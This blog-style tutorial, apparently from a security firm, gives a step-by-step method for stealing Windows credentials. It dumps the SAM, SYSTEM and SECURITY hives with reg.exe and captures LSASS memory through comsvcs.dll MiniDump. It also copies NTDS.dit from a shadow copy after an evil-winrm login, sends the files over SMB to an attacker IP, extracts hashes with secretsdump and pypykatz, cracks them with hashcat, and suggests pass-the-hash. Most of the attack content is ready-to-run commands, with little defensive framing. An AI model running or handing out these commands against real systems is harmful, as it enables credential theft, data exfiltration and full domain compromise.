The ultimate guide to Windows Local Password Attacks – Part 1

password attacks

Windows Password Attacks Overview

Windows password attacks focus on extracting and cracking stored credentials to gain unauthorized access to systems and networks. Attackers often target the Security Accounts Manager (SAM), LSASS process, and NTDS.dit files. These components store critical data like hashed passwords, cached credentials, and domain account information. By dumping and transferring these files to an attacker’s machine, the passwords can be cracked offline, bypassing security controls. Such attacks can lead to the compromise of both local and domain accounts, potentially giving attackers full control over a system or network

1) Attacking SAM:

First portion of windows password attacks include SAM. The Security Accounts Manager (SAM) in Windows is a crucial component that stores hashed passwords for local user accounts on a non-domain joined system. During local password attacks, gaining access to the SAM database is a primary target, as it allows attackers to retrieve these hashed passwords. Once the SAM database files are dumped from a compromised system, they can be transferred to an attack host for offline cracking. This enables attackers to bypass online restrictions and systematically attempt to crack the password hashes, potentially gaining access to sensitive accounts on the targeted machine.

With access to a non-domain joined Windows system, we may benefit from attempting to quickly dump the files associated with the SAM database to transfer them to our attack host and start cracking hashes offline.

Following steps can be used to perform the same:

1) Copying SAM Registry Hives:

There are three registry hives that we can copy if we have local admin access on the target.

Registry Hive
Description
hklm\sam
Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system
Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.
hklm\security
Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

 

Using reg.exe save to Copy Registry Hives:

run cmd as admin:

reg.exe save hklm\\sam C:\\sam.save
reg.exe save hklm\\system C:\\system.save
reg.exe save hklm\\security C:\\security.save

now, we can transfer these files to our machine by using smbserver.py and other methods.

  1. now, we will dump hashes:

Using secretsdump.py is a simple process. All we must do is run secretsdump.py using Python, then specify each hive file we retrieved from the target host.

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
  1. now we will crack hashes using hashcat
hashcat -m 1000 hashestocrack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

for transferring hashes to linux machine, we can use:

on linux run:

smbserver.py -smb2support CompData /home/ltnbob/Documents/

on windows run:

move sam.save \\\\10.10.15.16\\CompData
move security.save \\\\10.10.15.16\\CompData
move system.save \\\\10.10.15.16\\CompData

Remote Dumping & LSA Secrets Considerations

Attacking LSASS

The second portion of windows password attacks includes LSASS. The Local Security Authority Subsystem Service (LSASS) is a critical process in Windows operating systems responsible for enforcing security policies and managing user authentication. It handles processes like verifying users during login, generating access tokens, and storing sensitive security information, including user credentials in memory. Due to its vital role in managing authentication data, LSASS is a prime target in Windows password attacks.

Similar to the process of attacking the SAM database, with LSASS, it would be wise for us first to create a copy of the contents of LSASS process memory via the generation of a memory dump. Creating a dump file lets us extract credentials offline using our attack host.

Dumping LSASS Process Memory:

  1. Task Manager Method:

password attacks

A file called lsass.DMP is created and saved in:

C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp

This is the file we will transfer to our attack host. We can use the file transfer method discussed in the Attacking SAM section of this module to transfer the dump file to our attack host.

  1. Rundll32.exe & Comsvcs.dll Method:

Find the PID for LSASS:

in cmd:

tasklist /svc

in powershell:

Get-Process lsass

Creating lsass.dmp using PowerShell:

rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump <pid> C:\\lsass.dmp full

now, transfer these dump files over to attacker machine and crack the hashes.

Using Pypykatz to Extract Credentials from dumps:

pypykatz: https://github.com/skelsec/pypykatz

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Cracking the NT Hash with Hashcat:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Attacking Active Directory & NTDS.dit

Capturing NTDS.dit

Now, the third portion of windows password attacks includes NTDS.NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources. This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain similar to the technique we covered in this module’s Attacking SAM section.

Method 1

Step 1) Connecting to a DC with Evil-WinRM

evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Step 2) Checking Local Group Membership and Checking User Account Privileges including Domain

net localgroup  --> should see *Administrators
net user bwilliamson --> should see *Domain Admins

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.

 

step 3) Creating Shadow Copy of C:

vssadmin CREATE SHADOW /For=C:

step 4) Copying NTDS.dit from the VSS

cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

step 5) create smbshare on your attack machine to transfer files

step 6) Transferring NTDS.dit to Attack Host

cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\10.10.15.30\\CompData 

Cracking Hashes & Gaining Credentials:

using hashcat:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

If we are not able to crack the hashes, we can use pass the hash attack to perform lateral movement and other activities.


 

Conclusion:

Windows password attacks are a critical aspect of cybersecurity, focusing on extracting and cracking passwords stored on Windows systems. Attackers target key components such as the Security Accounts Manager (SAM), LSASS process, and NTDS.dit files, each of which stores important credential data. By successfully dumping these files, attackers can transfer them to an external host for offline cracking. This process allows them to bypass online defenses and systematically attempt to break the passwords, leading to unauthorized access to both local and domain accounts. Mastery of windows password attacks can result in full system or network compromise, underscoring the need for robust security measures to protect against such threats.

 

Our LinkedIn: https://www.linkedin.com/company/aspiainfotech/mycompany/

Share